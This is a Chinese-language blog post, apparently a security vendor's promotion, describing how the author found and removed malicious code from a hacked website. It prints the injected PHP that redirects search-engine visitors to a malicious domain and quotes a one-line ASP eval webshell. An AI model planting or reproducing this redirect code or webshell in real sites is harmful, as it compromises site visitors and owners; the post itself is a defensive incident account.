放假期間網站被掛馬的解決辦法
青島峰會期間本來想給自己放幾天假的,因為網站的掛馬給泡湯了,開啟網站首頁,使用瀏覽器的原始碼功能,發現自己網站的首頁多了很多木馬程式碼,於是我連線FTP檢視網站首頁的程式碼中發現了這個掛馬程式碼,下面我把程式碼貼出來 :
<?phperror_reporting(0);if(eregi(`google|soso|sogou|baidu`,$_SERVER[`HTTP_REFERER`]) ){ echo `<>window.location.href=”http://www.”+”tao”+”8s”+”.in”+”fo”;</>`;}
惡意的掛馬網址 www.tao8s.info
解釋一下:這個程式碼是 PHP的程式碼是一種條件性的掛馬,上面的google soso sogou baidu 都是掛馬的條件,意思就是當從 google soso…等等搜尋引擎來的訪問客戶會自動在網頁上隱藏一行程式碼也就是掛馬程式碼。
訪問這個網站的使用者,一般都會被360和百度提示網站有風險和網站掛馬提示的,但是這個掛馬為什麼不提示呢? 這裡我給大家解密下,不要以為病毒都會被防毒軟體殺掉,防毒軟體也不是萬能的,就像警察抓小偷,警察不知道小偷的特徵怎麼去抓捕呢? 防毒和這個道理一樣的是根據特徵來的,有一些病毒出來的早,沒有被防毒跟蹤到,所以360和百度也不會有什麼安全掛馬提示(一般業界人士稱“免殺病毒”。
說的有點多,言歸正傳。說點乾貨,那遇到這種情況咋辦啊,我的解決辦法就是先查清楚病因後除根,於是用FTP把網站程式全部打包下來然後一個一個檔案的檢查,看看有沒有其他名字的檔案,我在網上查到一般木馬檔名字都是global.asa global.asp 啥的,反正是些不熟悉的檔名,檢查了一下沒有發現特殊的檔名字,於是開始檢查程式碼方面,都知道程式設計師寫程式碼能累死,於是在百度上查到了一個叫sinesafe的網站掛馬程式碼檢查工具,這個工具是專門檢查掛馬程式碼的和木馬程式碼的。我把網站程式的程式碼檔案放到工具檢測了一下,發現了木馬程式碼 <%eval request(“hack”)%> eval的特徵程式碼,找到這個程式碼後我就給刪除了,重複的用掛馬檢測工具檢查了好幾遍,沒有發現問題後,我這才放心。連線到FTP,把網站程式重新上傳了一遍,網站這才穩定下來。
折騰了我一天,連午睡都沒撈著睡,困死我了。以上就是我網站被掛馬後的解決經歷,有什麼不懂的也隨時歡迎大家與我交流探討。
專注於安全領域 解決網站安全 解決網站被黑 網站被掛馬 網站被篡改
網站安全、伺服器安全提供商-www.sinesafe.com –專門解決其他人解決不了的網站安全問題.
相關文章
- 防止網站被掛馬的基本原則網站
- 如何修復被掛木馬的php網站PHP網站
- 開啟網站被掛馬跳轉到博彩頁面解決辦法網站
- Chrome被快播外掛劫持&解決辦法Chrome
- 網站被入侵 篡改程式碼劫持快照的解決辦法網站
- 網站被掛馬,非管理員訪問自動跳轉到廣告頁面解決辦法網站
- 網站漏洞修復公司處理網站被篡改跳轉到其他網站的解決辦法網站
- 公司網站被攻擊怎麼辦? 五種解決辦法幫您網站恢復正常訪問網站
- apache網站漏洞修復解決辦法Apache網站
- 網站title標題被改並被百度網址安全中心提醒的解決辦法網站
- Kindeditor 漏洞導致網站被植入木馬檔案的解決辦法網站
- MongoDB Drop集合不釋放磁碟空間的解決辦法MongoDB
- 網站漏洞修復對phpmyadmin防止被入侵提權的解決辦法網站PHP
- 修復網站漏洞對phpmyadmin防止被入侵提權的解決辦法網站PHP
- 多個旅遊網站被掛馬五一假期外出旅遊應小心網站
- SVN被鎖的解決辦法
- 企業網站常見耗資源、大流量、被掛馬的原因分析與對策網站
- 使用者被鎖解決辦法
- 有些網站打不開 某些網站打不開的解決辦法網站
- 阿里雲網站備案時網站無法訪問原因及解決辦法阿里網站
- 如何防止網站被侵入,如何防止網站被掛馬,如何防止網站被入侵?網站
- tomcat埠被佔用解決辦法Tomcat
- 網站劫持跳轉,分享網站被劫持跳轉的解決辦法網站
- 網站域名被QQ攔截提示:當前網頁非官方頁面攔截的解決辦法網站網頁
- 防止網站被入侵攻擊的五個辦法網站
- asp 網站被 sql 注入後的處理辦法網站SQL
- 網站快照被劫持,網站被劫持跳轉另一個網站解決辦法網站
- 網站被篡改了怎麼辦_網站被篡改了_把網站域名改了怎麼辦網站
- 網站域名被牆,解決網站域名被牆問題只需5步網站
- 網賭被黑贏錢網站不給提款有什麼解決辦法?網站
- pbootcms網站百度site網址異常的解決辦法boot網站
- Jenkins解決無法獲取外掛的辦法Jenkins
- PbootCMS網站掛馬被黑解決方案boot網站
- 網站被劫持 網站被劫持跳轉到非法頁面的解決辦法網站
- 網站被篡改了_網站被篡改了怎麼辦_防網站篡改了網站
- 網站執行PHP出現No input file specified 的解決辦法網站PHP
- AppStore稽核被拒原因及解決辦法APP
- 檢查電腦是否被掛馬的常用命令